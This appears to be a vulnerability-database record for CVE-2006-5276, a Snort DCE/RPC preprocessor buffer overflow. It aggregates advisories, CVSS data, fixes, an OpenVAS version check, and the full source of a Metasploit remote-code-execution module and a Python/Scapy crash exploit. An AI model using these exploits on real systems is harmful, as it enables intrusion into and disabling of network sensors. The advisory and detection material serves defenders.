Snort is an open-source intrusion detection system. It includes a DCE/RPC preprocessor, which reassembles DCE/RPC traffic before it is passed to the intrusion detection engine.
Problem
A buffer overflow vulnerability in the DCE/RPC preprocessor allows remote attackers to execute arbitrary commands by chaining together multiple **WriteAndX** requests in the same TCP segment.
Exploit works on Snort 2.6.1.1 on Windows and Snort 2.6.1.2 on Red Hat 8, and requires port 445/TCP to be open on the target.
Platforms
Windows 2000
Windows XP SP0 / Windows XP SP1
Windows XP SP2 / Windows XP
Linux
{"type": "saint", "published": "2007-07-09T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/snort_dcerpc", "bulletinFamily": "exploit", "id": "SAINT:AA4F55AACCFB3D420B4972A4E9BE4880", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-5276"]}, {"type": "exploitdb", "idList": ["EDB-ID:18723", "EDB-ID:3362", "EDB-ID:3609", "EDB-ID:3391"]}, {"type": "cert", "idList": ["VU:196240"]}, {"type": "nessus", "idList": ["FEDORA_2007-2060.NASL", "FREEBSD_PKG_AFDF500FC1F611DB95C5000C6EC775D9.NASL", "GENTOO_GLSA-200703-01.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16119", "SECURITYVULNS:VULN:7267"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:54632", "PACKETSTORM:111677"]}, {"type": "gentoo", "idList": ["GLSA-200703-01"]}, {"type": "freebsd", "idList": ["AFDF500F-C1F6-11DB-95C5-000C6EC775D9"]}, {"type": "openvas", "idList": ["OPENVAS:58060", "OPENVAS:861388", "OPENVAS:58055"]}, {"type": "osvdb", "idList": ["OSVDB:32094"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:972D8B6C7B644A1017D14AAFD8E54233"]}, {"type": "saint", "idList": ["SAINT:28934E2EE6C1637FE0B15CF3B036D041", "SAINT:6F8187844280358245887CA26BCF35B3"]}, {"type": "seebug", "idList": ["SSV:6573"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/IDS/SNORT_DCE_RPC"]}, {"type": "canvas", "idList": ["SNORTRPC"]}], "modified": "2019-05-29T17:19:56", "rev": 2}, "score": {"value": 10.2, "vector": "NONE", "modified": "2019-05-29T17:19:56", "rev": 2}, "vulnersScore": 10.2}, "edition": 2, "viewCount": 9, "cvelist": ["CVE-2006-5276"], "references": [], "lastseen": "2019-05-29T17:19:56", "reporter": "SAINT Corporation", "modified": "2007-07-09T00:00:00", "title": "Snort DCE/RPC preprocessor buffer overflow", "description": "Added: 07/09/2007 \nCVE: [CVE-2006-5276](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276>) \nBID: [22616](<http://www.securityfocus.com/bid/22616>) \nOSVDB: [32094](<http://www.osvdb.org/32094>) \n\n\n### Background\n\n[Snort](<http://www.snort.org>) is an open-source intrusion detection system. It includes a DCE/RPC preprocessor, which reassembles DCE/RPC traffic before it is passed to the intrusion detection engine. \n\n### Problem\n\nA buffer overflow vulnerability in the DCE/RPC preprocessor allows remote attackers to execute arbitrary commands by chaining together multiple `**WriteAndX**` requests in the same TCP segment. \n\n### Resolution\n\n[Upgrade](<http://www.snort.org/dl/>) to Snort 2.6.1.3 or higher. \n\n### References\n\n<http://www.us-cert.gov/cas/techalerts/TA07-050A.html> \n<http://www.snort.org/docs/advisory-2007-02-19.html> \n\n\n### Limitations\n\nExploit works on Snort 2.6.1.1 on Windows and Snort 2.6.1.2 on Red Hat 8, and requires port 445/TCP to be open on the target. \n\n### Platforms\n\nWindows 2000 \nWindows XP SP0 / Windows XP SP1 \nWindows XP SP2 / Windows XP \nLinux \n \n\n", "scheme": null, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:27:24", "description": "Stack-based buffer overflow in the DCE/RPC preprocessor in Snort before 2.6.1.3, and 2.7 before beta 2; and Sourcefire Intrusion Sensor; allows remote attackers to execute arbitrary code via crafted SMB traffic.\nAll affected Sourcefire Intrustion Sensor products are only vulnerable if they are used with SEUs prior to SEU 64.\nUpgrade to the latest version of Snort (2.6.1.3 or later), available from the Snort Web site.", "edition": 6, "cvss3": {}, "published": "2007-02-20T01:28:00", "title": "CVE-2006-5276", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-5276"], "modified": "2018-10-17T21:41:00", "cpe": ["cpe:/a:sourcefire:intrusion_sensor:4.6", "cpe:/a:snort:snort:2.6.1.1", "cpe:/a:snort:snort:2.6.1", "cpe:/a:sourcefire:intrusion_sensor:4.1", "cpe:/a:snort:snort:2.6.1.2", "cpe:/a:snort:snort:2.7_beta1", "cpe:/a:sourcefire:intrusion_sensor:4.5"], "id": "CVE-2006-5276", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5276", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:snort:snort:2.6.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:snort:snort:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:snort:snort:2.7_beta1:*:*:*:*:*:*:*", "cpe:2.3:a:snort:snort:2.6.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:sourcefire:intrusion_sensor:4.6:*:crossbeam:*:*:*:*:*", "cpe:2.3:a:sourcefire:intrusion_sensor:4.5:*:*:*:*:*:*:*", "cpe:2.3:a:sourcefire:intrusion_sensor:4.1:*:*:*:*:*:*:*", "cpe:2.3:a:sourcefire:intrusion_sensor:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:sourcefire:intrusion_sensor:4.5:*:crossbeam:*:*:*:*:*", "cpe:2.3:a:sourcefire:intrusion_sensor:4.1:*:crossbeam:*:*:*:*:*"]}], "canvas": [{"lastseen": "2019-05-29T17:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "description": "**Name**| snortrpc \n---|--- \n**CVE**| CVE-2006-5276 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Snort RPC \n**Notes**| CVE Name: CVE-2006-5276 \nVENDOR: SourceFire \nNotes: This version of the exploit needs to connect to a port 139 \nNote that it does not need to be an actual Netbios target. \nSomething like a netcat listener will work fine. \n \nRepeatability: Single shot \nReferences: http://xforce.iss.net/xforce/xfdb/31275 \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276 \nDate public: 19-02-2007 \nCVSS: 10.0 \n\n", "edition": 3, "modified": "2007-02-20T01:28:00", "published": "2007-02-20T01:28:00", "id": "SNORTRPC", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/snortrpc", "title": "Immunity Canvas: SNORTRPC", "type": "canvas", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2019-06-04T23:19:32", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "description": "Added: 07/09/2007 \nCVE: [CVE-2006-5276](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276>) \nBID: [22616](<http://www.securityfocus.com/bid/22616>) \nOSVDB: [32094](<http://www.osvdb.org/32094>) \n\n\n### Background\n\n[Snort](<http://www.snort.org>) is an open-source intrusion detection system. It includes a DCE/RPC preprocessor, which reassembles DCE/RPC traffic before it is passed to the intrusion detection engine. \n\n### Problem\n\nA buffer overflow vulnerability in the DCE/RPC preprocessor allows remote attackers to execute arbitrary commands by chaining together multiple `**WriteAndX**` requests in the same TCP segment. \n\n### Resolution\n\n[Upgrade](<http://www.snort.org/dl/>) to Snort 2.6.1.3 or higher. \n\n### References\n\n<http://www.us-cert.gov/cas/techalerts/TA07-050A.html> \n<http://www.snort.org/docs/advisory-2007-02-19.html> \n\n\n### Limitations\n\nExploit works on Snort 2.6.1.1 on Windows and Snort 2.6.1.2 on Red Hat 8, and requires port 445/TCP to be open on the target. \n\n### Platforms\n\nWindows 2000 \nWindows XP SP0 / Windows XP SP1 \nWindows XP SP2 / Windows XP \nLinux \n \n\n", "edition": 4, "modified": "2007-07-09T00:00:00", "published": "2007-07-09T00:00:00", "id": "SAINT:28934E2EE6C1637FE0B15CF3B036D041", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/snort_dcerpc", "title": "Snort DCE/RPC preprocessor buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "description": "Added: 07/09/2007 \nCVE: [CVE-2006-5276](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5276>) \nBID: [22616](<http://www.securityfocus.com/bid/22616>) \nOSVDB: [32094](<http://www.osvdb.org/32094>) \n\n\n### Background\n\n[Snort](<http://www.snort.org>) is an open-source intrusion detection system. It includes a DCE/RPC preprocessor, which reassembles DCE/RPC traffic before it is passed to the intrusion detection engine. \n\n### Problem\n\nA buffer overflow vulnerability in the DCE/RPC preprocessor allows remote attackers to execute arbitrary commands by chaining together multiple `**WriteAndX**` requests in the same TCP segment. \n\n### Resolution\n\n[Upgrade](<http://www.snort.org/dl/>) to Snort 2.6.1.3 or higher. \n\n### References\n\n<http://www.us-cert.gov/cas/techalerts/TA07-050A.html> \n<http://www.snort.org/docs/advisory-2007-02-19.html> \n\n\n### Limitations\n\nExploit works on Snort 2.6.1.1 on Windows and Snort 2.6.1.2 on Red Hat 8, and requires port 445/TCP to be open on the target. \n\n### Platforms\n\nWindows 2000 \nWindows XP SP0 / Windows XP SP1 \nWindows XP SP2 / Windows XP \nLinux \n \n\n", "edition": 1, "modified": "2007-07-09T00:00:00", "published": "2007-07-09T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/snort_dcerpc", "id": "SAINT:6F8187844280358245887CA26BCF35B3", "type": "saint", "title": "Snort DCE/RPC preprocessor buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:34", "description": "", "published": "2012-04-10T00:00:00", "type": "packetstorm", "title": "Snort 2 DCE/RPC Preprocessor Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2012-04-10T00:00:00", "id": "PACKETSTORM:111677", "href": "https://packetstormsecurity.com/files/111677/Snort-2-DCE-RPC-Preprocessor-Buffer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Capture \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Snort 2 DCE/RPC preprocessor Buffer Overflow', \n'Description' => %q{ \nThis module allows remote attackers to execute arbitrary code by exploiting the \nSnort service via crafted SMB traffic. The vulnerability is due to a boundary \nerror within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, \nwhich may result a stack-based buffer overflow with a specially crafted packet \nsent on a network that is monitored by Snort. \n \nVulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. \n \nAny host on the Snort network may be used as the remote host. The remote host does not \nneed to be running the SMB service for the exploit to be successful. \n}, \n'Author' => \n[ \n'Neel Mehta', #Original discovery (IBM X-Force) \n'Carsten Maartmann-Moe <carsten[at]carmaa.com>' #Metasploit \n], \n'License' => MSF_LICENSE, \n'Platform' => 'win', \n'References' => \n[ \n[ 'OSVDB', '67988' ], \n[ 'CVE', '2006-5276' ], \n[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py'] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 390, \n'BadChars' => \"\\x00\", \n'DisableNops' => true, \n}, \n'Targets' => \n[ \n[ \n'Windows Universal', \n{ \n'Ret' => 0x00407c01, # JMP ESP snort.exe \n'Offset' => 289 # The number of bytes before overwrite \n} \n], \n], \n'Privileged' => true, \n'DisclosureDate' => 'Feb 19 2007', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(139), \nOptAddress.new('RHOST', [ true, 'A host on the Snort-monitored network' ]), \nOptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address']) \n], self.class) \n \nderegister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT') \nend \n \ndef exploit \nopen_pcap \n \nshost = datastore['SHOST'] || Rex::Socket.source_address(rhost) \n \np = buildpacket(shost, rhost, rport.to_i) \n \nprint_status(\"Sending crafted SMB packet from #{shost} to #{rhost}:#{rport}...\") \n \ncapture_sendto(p, rhost) \n \nhandler \nend \n \ndef buildpacket(shost, rhost, rport) \np = PacketFu::TCPPacket.new \np.ip_saddr = shost \np.ip_daddr = rhost \np.tcp_dport = rport \np.tcp_flags.psh = 1 \np.tcp_flags.ack = 1 \n \n# SMB packet borrowed from http://exploit-db.com/exploits/3362 \n \n# NetBIOS Session Service, value is the number of bytes in the TCP segment, \n# must be greater than the total size of the payload. Statically set. \nheader = \"\\x00\\x00\\xde\\xad\" \n \n# SMB Header \nheader << \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\" \nheader << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\" \nheader << \"\\x00\\x08\\x30\\x00\" \n \n# Tree Connect AndX Request \nheader << \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\" \nheader << \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\" \nheader << \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\" \nheader << \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\" \n \n# NT Create AndX Request \nheader << \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nheader << \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nheader << \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\" \nheader << \"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\" \nheader << \"\\x63\\x00\\x00\\x00\" \n \n# Write AndX Request #1 \nheader << \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\" \nheader << \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\" \nheader << \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\xff\\x01\\x00\\x00\\x01\\x00\\x00\\x00\" \nheader << \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\" \nheader << \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\" \nheader << \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\" \nheader << \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\" \n \n# Write AndX Request #2 \nheader << \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\" \nheader << \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\" \n \ntail = \"\\x00\\x00\\x00\\x00\\x49\\x00\\xee\" \n \n# Return address \neip = [target['Ret']].pack('V') \n \n# Sploit \nsploit = make_nops(10) \nsploit << payload.encoded \n \n# Padding (to pass size check) \nsploit << make_nops(1) \n \n# The size to be included in Write AndX Request #2, including sploit payload \nrequestsize = [(sploit.size() + target['Offset'])].pack('v') \n \n# Assemble the parts into one package \np.payload = header << requestsize << tail << eip << sploit \np.recalc \n \np \nend \nend`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/111677/snort_dce_rpc.rb.txt"}, {"lastseen": "2016-12-05T22:24:42", "description": "", "published": "2007-02-24T00:00:00", "type": "packetstorm", "title": "snort-py.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2007-02-24T00:00:00", "id": "PACKETSTORM:54632", "href": "https://packetstormsecurity.com/files/54632/snort-py.txt.html", "sourceData": "`#!/usr/bin/python \n# \n# Snort DCE/RPC Preprocessor Buffer Overflow (DoS) \n# \n# Author: Trirat Puttaraksa <trir00t [at] gmail.com> \n# \n# http://sf-freedom.blogspot.com \n# \n###################################################### \n# For educational purpose only \n# \n# This exploit just crash Snort 2.6.1 on Fedora Core 4. However, Code Execution \n# may be possible, but I have no time to make it :( \n# I will post the information about this vulnerability in my blog soon \n# \n# Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/) \n# to inject the packet, so you have to install Scapy before use it. \n# \n####################################################### \n \nimport sys \nfrom scapy import * \nfrom struct import pack \nconf.verb = 0 \n \n# NetBIOS Session Service \npayload = \"\\x00\\x00\\x01\\xa6\" \n \n# SMB Header \npayload += \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\" \npayload += \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\" \npayload += \"\\x00\\x08\\x30\\x00\" \n \n# Tree Connect AndX Request \npayload += \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\" \npayload += \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\" \npayload += \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\" \npayload += \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\" \n \n# NT Create AndX Request \npayload += \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \npayload += \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \npayload += \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\" \npayload += \"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\" \npayload += \"\\x63\\x00\\x00\\x00\" \n \n# Write AndX Request #1 \npayload += \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\" \npayload += \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\" \n \npayload += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\xff\\x01\\x00\\x00\\x01\\x00\\x00\\x00\" \npayload += \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\" \npayload += \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\" \npayload += \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\" \npayload += \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\" \n \n# Write AndX Request #2 \npayload += \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\" \npayload += \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\\x30\\x01\\x00\\x00\\x00\\x00\\x49\\x00\\xee\" \n \npayload += \"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\x48\\x00\\x00\\x00\\x01\\x00\\x00\\x00\" \npayload += \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\" \npayload += \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\" \npayload += \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\" \npayload += \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\" \n \nif len(sys.argv) != 2: \nprint \"Usage snort_dos_dcerpc.py <fake destination ip>\" \nsys.exit(1) \n \ntarget = sys.argv[1] \n \np = IP(dst=target) / TCP(sport=1025, dport=139, flags=\"PA\") / payload \nsend(p) \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/54632/snort-py.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-5276"], "description": "## Vulnerability Description\nA remote overflow exists in Snort. The DCE/RPC Pre-Processor fails to check if traffic is part of a valid TCP session, and multiple \"Write AndX\" requests can be chained in the same TCP segment resulting in a stack overflow. With a specially crafted SMB packet, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Technical Description\nUsers who have disabled the DCE/RPC preprocessor are not vulnerable. However, the DCE/RPC preprocessor is enabled by default.\n## Solution Description\nUpgrade to version 2.6.1.3 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround:\nDisable the DCE/RPC preprocessor by removing the DCE/RPC preprocessor directives from snort.conf and restarting Snort. However, be advised that disabling the DCE/RPC preprocessor reduces detection capabilities for attacks in DCE/RPC traffic.\n## Short Description\nA remote overflow exists in Snort. The DCE/RPC Pre-Processor fails to check if traffic is part of a valid TCP session, and multiple \"Write AndX\" requests can be chained in the same TCP segment resulting in a stack overflow. With a specially crafted SMB packet, an attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\n[Vendor Specific Advisory URL](http://www.snort.org/docs/advisory-2007-02-19.html)\n[Vendor Specific Advisory URL](http://www116.nortelnetworks.com/pub/repository/CLARIFY/DOCUMENT/2007/08/021923-01.pdf)\n[Vendor Specific Advisory URL](http://www130.nortelnetworks.com/go/main.jsp?cscat=BLTNDETAIL&DocumentOID=540173)\nUS-CERT Cyber Security Alert: TA07-050A\nSecurity Tracker: 1017670\n[Secunia Advisory ID:24239](https://secuniaresearch.flexerasoftware.com/advisories/24239/)\n[Secunia Advisory ID:24235](https://secuniaresearch.flexerasoftware.com/advisories/24235/)\n[Secunia Advisory ID:26746](https://secuniaresearch.flexerasoftware.com/advisories/26746/)\n[Secunia Advisory ID:24190](https://secuniaresearch.flexerasoftware.com/advisories/24190/)\n[Secunia Advisory ID:24240](https://secuniaresearch.flexerasoftware.com/advisories/24240/)\n[Secunia Advisory ID:24272](https://secuniaresearch.flexerasoftware.com/advisories/24272/)\nOther Advisory URL: http://www.iss.net/threats/257.html\nOther Advisory URL: https://www.redhat.com/archives/fedora-package-announce/2007-September/msg00122.html\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200703-01.xml\nOther Advisory URL: http://isc.sans.org/diary.html?storyid=2280\nNews Article: http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=security&articleId=9011574\n[Nessus Plugin ID:24686](https://vulners.com/search?query=pluginID:24686)\nISS X-Force ID: 31275\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3362\nFrSIRT Advisory: ADV-2007-0668\nFrSIRT Advisory: ADV-2007-0656\n[CVE-2006-5276](https://vulners.com/cve/CVE-2006-5276)\nCERT VU: 196240\nBugtraq ID: 22616\n", "edition": 1, "modified": "2007-02-17T00:00:00", "published": "2007-02-17T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:32094", "id": "OSVDB:32094", "title": "Snort DCE/RPC Pre-Processor Packet Reassembly Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5276"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-30T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:58055", "href": "http://plugins.openvas.org/nasl.php?oid=58055", "type": "openvas", "title": "FreeBSD Ports: snort", "sourceData": "#\n#VID afdf500f-c1f6-11db-95c5-000c6ec775d9\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: snort\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://xforce.iss.net/xforce/xfdb/31275\nhttp://www.snort.org/docs/advisory-2007-02-19.html\nhttp://www.vuxml.org/freebsd/afdf500f-c1f6-11db-95c5-000c6ec775d9.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(58055);\n script_version(\"$Revision: 4188 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-30 07:56:47 +0200 (Fri, 30 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-5276\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: snort\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"snort\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.6.1\")>=0 && revcomp(a:bver, b:\"2.6.1.3\")<0) {\n txt += 'Package snort version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5276"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200703-01.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:58060", "href": "http://plugins.openvas.org/nasl.php?oid=58060", "type": "openvas", "title": "Gentoo Security 